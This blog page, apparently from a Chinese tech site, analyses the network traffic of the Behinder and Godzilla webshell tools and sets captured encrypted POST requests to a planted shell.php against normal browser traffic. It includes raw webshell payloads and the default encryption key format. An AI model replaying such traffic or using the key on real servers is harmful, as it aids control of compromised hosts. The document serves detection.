mAUYLzmqn5QPDkyI5lvSp0fjiBu1e7047YjfczwY6j5DjtZ1pJxI+rRyfLpDLDZFjAqAF/QSIlAz8yEoP9+dJAHCXfGi+x0M2DUY5/H+f575RZjGMRhZojou233jn4t5wrUlm4Q3Umh2Aj98pftx611h3vV6RfM3LLtuzQmlLbhu34QreAiP+DgXtfpbQPkn+uSaEaTmhY6YmmZgw77L+1E3TUSI2cKfwqBYnn+95EUHAiF4QsKFoG1BPVsvp2ZCRrZFewSdMJSTnScaChF/oEXv3myVE3tOJLrIorv29A5raVMQmPbyxMZiBaTQgZdhiHJ9+UQdljZHXQERN43jsaYuQbjLY5vRXrChJc+TJKKYwedcr5D+8iPbkcv8pGh5cbXu00xXNZIl4a6HmA/57mXujyDNNWggJTV+s+3gNWCc2nwVZWPxqcRIxiMIRZy2cWcahVMn+Ao4jk8i6ym/awiStk6jGzAzs1JeYAsd8B8jhv/5iPC1sXID1YoBJhVhCWFN/3Hx5kyIaF6ZtS4a9JiFjt8RUVwc+iSI+AP0ln5DWmBtgx6ZuK4UBq1fnDPDwZPxmwbVq55ZKq39g+v97UJTpQ0kLmCuZHMHdM3zaWAo3EkLUu14meVJflYGvV9TIUuE/1vJU5s+4DWOJsTK1zSGO/50yCdyalwMcBsExX78fE/Ly/8QU0xpo1unNIG3ySoJ3AnbFc2kZeEvEbwUn16XFwNYYZmNkb0HaLA3pE/4u5Z1lUs9lA+/pFRevaCPhMo6/vgXYd/K12dk3gVaX3motZLrWsjxHr9zuiq+b8j9DE1nW2NVCi3h2PqaRNPn/NKFMUOKEOF4i3w3kizAApNJD7CYFYKvIuz3CMB/tLYAdqPWSShNpjvewxcu7J4ogdA/pWyGGE3Ngw2RCBT10yDknWT2U/rdxDmLGp8U1AkXN8F92tTyxVCiaDYj0wTT4duUlLLSCV/+ACl+TJgP6Takv2UeNSz1y/SI4oHkORlBAemSYcoB9/nbIKbxE9dHoucwyEBJVXlz2333dt4O4gX3NqSNWcnhiV6+4JltsYxn0jRXc+1ZKado6QG2aNJRS6ENHTVlbZnR1zCT6yxfK3tzQoXYAjCG6vpYxFccuO60CVJOqI7wbhwegATBCaSMmnymO0nCEKU3G1SrA6juV/FpHS9xQwGQwXsF9ilrXQripSUKYjlH0RQIOsLpOPy9nrd/uJmdBWs6W22PMtXl41+z7o8Qm20AgJqJje7GQw+BeOSVyTm4q3MgHUCGHrzuFjeggNCYoIaOZHcQZyj5NYSrKEcTUBZHGA+Bc+RMJ9xAc28IyBW2vNGEf7UJiWgCCCTeE1vacsq22wIaDD2AsIGsklkdrQXd0ty3lHAYIhzk51BXQiP5PMGGWA4BIhaRbFero56WmB2rIEhHurkBY1db57TXK2bs+H/WLOM79nXMPoyMHp4klNzlxdJNVAK87ITELXK/W7LaCBA8rAk9rLVRvB1nk7iDhXrUpz7OXyArYEVjUn0Q4mXXyNkWxdQcvn/T2qk1WmkklDFYORpNehtEyeosJ6RvM65B0934qG5uCYgmOZ6DpcddMk0RLVLubqDif95YS1N5WZHD/MrzypoJ64cigRzybTokKiK6cWJvmOA/8wCkxwKxBTaYHSlIsz1bYZGj07+W8U0l1Vgf71/gp1tW1GYcWSrZSSgCipBov0+xJwZm94MRu4psTG1Wg6M99vdFsKgPMPgjJmY6yHjWPCeLFVffHFLXnt+cYghgI8dj2mxR0l/h3NDs0bGfveF6gTtzU70tOhHWFGRrxi7Y/th6au0X08rEsvB+rsGJ4Huovtqw8sKGTXuKHWqNLmm+YWgMcvCd2ob8R7Rca1bsFyTOnfhoSNPRg9sWK/7UVQSthLR3imeFMqm9Qqh01EOIBTMY3EF8CJwL1Qfuv3WjU/BGNIoNbbI7Pd9K5xpcqgq/Y6XxsFWKtF06b8c3AJMakeBiicI4jdprtiPUU5y0iX9FDR/tfzvyk8Ojg8Rt2Wj9Av9fKiHlRjncBsDZZKhlnLm5kjJUPLplfdWTIflYxMtoTWulj/ipz0IyaVBYQOvxMQ4tKvnk11w+TebzjWBMG8aOdmmZsNlxYjqidRnofonRaNS2+9GkgkCtrUlzt5XYGsqQkakJIyImGCU5kZ7jxjcfENMGqGM66ZDTwfGbL14VIOVHk6KG/aHEAXCPGiZFYzVu+Gd/W1OoO/CBipQSsS9SMECz2OWd0KxkNnTK56CulMexBsoEMY6rk8uFU0ApJ2HhJcS9MAJcA2Zuku8mv7p9XhLtdih5R06zeuvlkTKqroJ2xf3w9s74zpu5x9kC8fyqKuYbrrpljWTt6U3iLgQ/gyu8blilG7p/uGySCiPODl0VL3S8OgXVtW7XMo9hcpWkjoZb3+NEFgOahpYqK530kgp5xnxyrgt7EFbzrxyyWRjrnVWkGxK7YWCF/Dvy/oZfxO2TJEsBlZYhxP1stKonGKUagZfzWHqh784nPxnbuWS/HUWRjwLfW1BSbRoE58j3B2XCDZWQfbhTB6XMy/sFH0f8WIreQrp3frQKSvijw4fvEN0gpG44L7j/Ewy7Q5gtB8wK6aDsFlAU2Y2nkASXM1kDOGwYWPDU2qLjgXD0kSPBnQ+zDlegXbrKYq7Rx3xOVRDNiJIOC6oDIX6GpL6HFpXWSJ73fDQ660MaWbNdf82Y6pnQJAA7DMx36YM9b715jrvkQNLCTcaoSd/3gYDlB6nC+RwsnH2XIhds8wXh6Wz/WmFpCm4ubDlJpxt8FZoQgGXKdeios/fjNcIBk3S0pTj2BwXUTB6qxxgUK4n5d29kRHAB+PGaj84E4kDyiPvk7c1tche8WUtPQQ9uSZNr3Mqz6ggbrzPJbjRfkoCkrYpNNVJIHFIl2GceMQe3p4BZOsl9MagwC6olgQykOrXSLG06HrDMVERBVOl8+vTgKLNvQNL/i0MCYnKZCuNqhwxrT57CeCf5aO1kbmHe9QujXz7Vbwq6amdK4Vkwm8Vrj+7vD43NCy2zkf6JJFgKD/e7g/U3kqR2vkFtP32gO3QjZ4gGHCaOTdxCQeRj7RHWwpsatNcTBLiJ2S/ombjezuCTAMbR8S0LVt1GHc+ESQQws68xoVRVwbhaUMN0YHoF1TM/jxK6UQ4MGnKCa1MvMszeBbvhj2jkirqXHm1DhctIVDQ4OgGTFOwMfgB5VsVPD+ODhTpWq8bvVOdQYgjCqiZ45sZWBXv/0nMDuBNTT1ICgz+RdHpKWLxXk9ndblde59AofI4ZsfmG6INc+GNLEUWOX4raSkV7U8gNTmLkusHizZLH9tMJB4zSauh1OjRrjR1T+jaYpTy5V/ol2bNY4AbR70CZPdcM6U9J3l6BNZm1i16q2p/52Yk6RIT2KoxcxWWpTud8fyQ7pDSfV13P83Uy1kaCq2R8MA+GdYCqpS8HOJUuh8Db4/F7B3Q+9B9MpAnh1aNMJ+Ds8D+YuaN2YC+bsqabtNDDKqv3mZESi829I5IXeKll5jFf4z3Q8U1CYwD2tPWfO94Z9GeYt2Nfdf/bmSF4uQH+5IEthEueAi9YnajiXFjSmqtrgJUletPvinpjn0p1r399pRwivl6hGSd+k7eDeK/HxmIT/BOBjnCyZkg365mmE34uu8GAapO51tOoUk3pyYlDXVmeDxmqapeFK9oRvbqyG4azg9gS+zTw8YLbt3wWG7EjONzmb/pK2Dh0o6M+xMuItZRhie8ceBz4pcfmB9sdH7HyZJuMd/emQEkb/DYafX6T/pQCtW3L2nJEoY/1384SWoNv3qmilaaEOBPQK3CGBa0M+HT2HBkv8beTvEK/GvrrhNIhGeRVpVbqPfaPN0S/cjQcclgB/bIi5HySgAGySV9onxf4ubo2FstB9hUWcGwONA==POST /shell.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-type: application/x-www-form-urlencoded
Referer: http://192.168.4.229/shell.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.4.229
Connection: keep-alive
Content-Length: 4716
Cookie: PHPSESSID=kv8hmj5ack6dv9uiobhoaff176;PHPSESSID=kv8hmj5ack6dv9uiobhoaff176

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

1 user-agent

火狐瀏覽器與冰蝎流量的user-agent對比

火狐瀏覽器的user-agent

 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0

冰蝎流量的user-agent

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36

正常流量與冰蝎流量的對比

正常流量

GET /shell.php HTTP/1.1
Host: 192.168.4.229
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=kof14ks054u9oo46uacv6vjgvk
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

冰蝎流量

POST /shell.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-type: application/x-www-form-urlencoded
Referer: http://192.168.4.229/shell.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.4.229
Connection: keep-alive
Content-Length: 6252

流量特征加密

冰蝎 加密方式為 利用動態二進制加密(AES加密)

另一個特征 全程無明文互動,密鑰格式為md5("admin")[0:16];”

密鑰加密方式為md5

哥斯拉流量

流量特征 密碼 eval pass

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/413260.html

標籤:其他

上一篇:ctf.show web入門(資訊搜集) 1~20

下一篇:【攻防世界pwn-cgpwn2】

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more